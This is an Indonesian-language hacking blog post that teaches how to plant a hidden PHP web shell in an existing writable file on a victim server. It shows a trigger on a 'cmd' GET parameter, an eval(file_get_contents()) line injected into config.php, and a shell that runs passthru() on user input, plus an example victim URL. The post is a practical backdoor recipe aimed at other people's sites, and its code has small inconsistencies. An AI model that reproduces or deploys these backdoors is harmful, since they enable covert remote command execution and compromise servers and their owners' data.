Hidden Shell and inject shell

Pernah denger kan kata itu. gw denger kata itu dari phpshell yang dibuat oleh Gblack. Private shell ver. 1.3. mungkin pernah ada yang coba. phpshell ini dibuat untuk hidden shell di file php yang memang sudah ada di server dan bisa ditulisi atau dengan permision 777. kalau memang blom pernah coba.. download disini aja coba [download].

mungkin ada yang penasaran.. kenapa setiap file yang di tambahin variable cmd= di url itu keluar shell??


misal : hxxp://site.com/index.php?cmd=hacked

nah dengan pemanggilan seperti itu bisa keluar shell yang tersembunyi.
bagi seorang programer PHP hal ini ngga akan sulit tapi untuk seorang yang bener bener awam dengan php. bahkan mungkin setiap kali menggunakan phpshell tidak pernah liat sebenernya apa sih isi source nya itu bisa sampe ngexekusi system. Biasanya para pengguna seperti ini disebut sebagai script kiddies. yang hanya mengunakan tool tanpa mengerti bagaimana tools itu berkerja. ok masuk ke rahasia nya. jadi rahasianya ada di awal script itu. yaitu

if(!empty($_GET['cmd']){

>>> shell <<<
}

nah dari tambahan script itu. jika kita suntikan di file php. setiap kali ada tambahan variable cmd di url dan variablenya ngga kosong. maka itu shell akan muncul. kalian bisa mencoba nya di localhost.

tapi,, tetep ada tapinya. dengan kita menambah phpshell di file php otomatis size file php tersebut akan membengkak. agar tidak membengkak. maka kita gunakan fungsin yang sudah di sediakan oleh phpnya sendiri. yaitu fungsi file_get_contents(). dengan cara ini kita bisa mengambil isi file dari mana saja. misal..

kita punya shell yang kita simpan di folder tmp dengan file shell.txt nah kita ingin memanggilnya maka untuk kita inject di file php yang ada di public_html. Caranya tinggal kita panggil dengan fungsi file_get_contents() dan bantuan fungsi eval() (untuk lebih jelasnya fungsi ini bisa liat di php manual). contoh :

--- file config.php ---

<?php
$password = 'root';
$username = 'root';
eval(file_get_contents('/tmp/shell.txt'));
?>

--- end file config.php ---

nah dengan isi shell.txt seperti ini misal.

--- file shell.txt ---

<?php
echo "<form method='POST'>";
echo "<input type='txt' name='thund3rcmd'>";
echo "</form>";
$cmd = passthru($_GET['thund3rcmd']);
if(!empty($cmd)) {
?>
<pre>$cmd</pre>
<?php }} ?>

--- end shell.txt ---

itu misalnya saja.. nah itu di simpen di folder tmp. jadi kita manggilnya kayak gini

hxxp://victim.com/config.php?cwd=hackedbythund3r-x2

dan mudah mudahan.. klo shell ga error.. pasti bisa di exekusi.

dengan cara menggunakan fungsi file_get_contents() tadi. maka size file yang di inject ga akan terlalu membengkak..

sebenernya banyak cara lain.. ya tergantung creativitas yang pake aja deh.. seep..
be creative..

Segitu aja dulu.. :D
seep

kekurangan harap di maklum. tapi klo kelebihan hmm.. balikin aja ya.. :D

thanks for phpshellnya Gblack a.k.a biadabz